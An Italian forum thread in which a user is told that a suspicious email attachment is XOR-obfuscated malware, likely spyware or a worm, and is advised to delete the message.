Tutto questo comportamento è già sufficiente per capire che si tratta di un malware. Per vedere esattamente qual'è il codice finale che viene lanciato dovresti prendere tutti i caratteri, uno per uno, della stringa lunga e darli in XOR con il valore ASCII del carattere '5'. Adesso però non ho voglia/tempo io di farlo: se proprio ti interessa sapere in dettaglio cosa fa puoi fartelo da solo - altrimenti se mi va lo farò domani (o lo farà qualcun'altro di inforge meno svogliato di me). Ma sinceramente fai prima a cestinare quella mail e pace.
 
Grazie per la risposta, mi chiedo solo come abbia fatto a trovare la mia email e a cosa possa servire quel malware !


Inviato dal mio iPhone utilizzando Tapatalk
 
Nicholas26 ha detto:
Grazie per la risposta, mi chiedo solo come abbia fatto a trovare la mia email e a cosa possa servire quel malware !
Clicca per espandere...
Le mail le trovano sul web, nella lista contatti di altre persone che hanno infettato (worm) oppure semplicemente le generano casualmente. Capita normalmente di ricevere queste mail - non è una cosa strana. Cercano semplicemente di infettare gente random. Probabilmente quel codice sarà uno spyware (come la gran parte dei malware che girano oggi) che cerca di rubare dati e informazioni sensibili (password salvate, carte di credito, ecc.) e forse, appunto, uno worm - ossia che prende la tua lista dei contatti salvati in modo tale poi da avere una lista di altri indirizzi a cui spedire il malware.
Non devi meravigliarti. Ne riceverai assai nella vita di mail simili - garantito.
 
Stato
Discussione chiusa ad ulteriori risposte.
Top Bottom
Indietro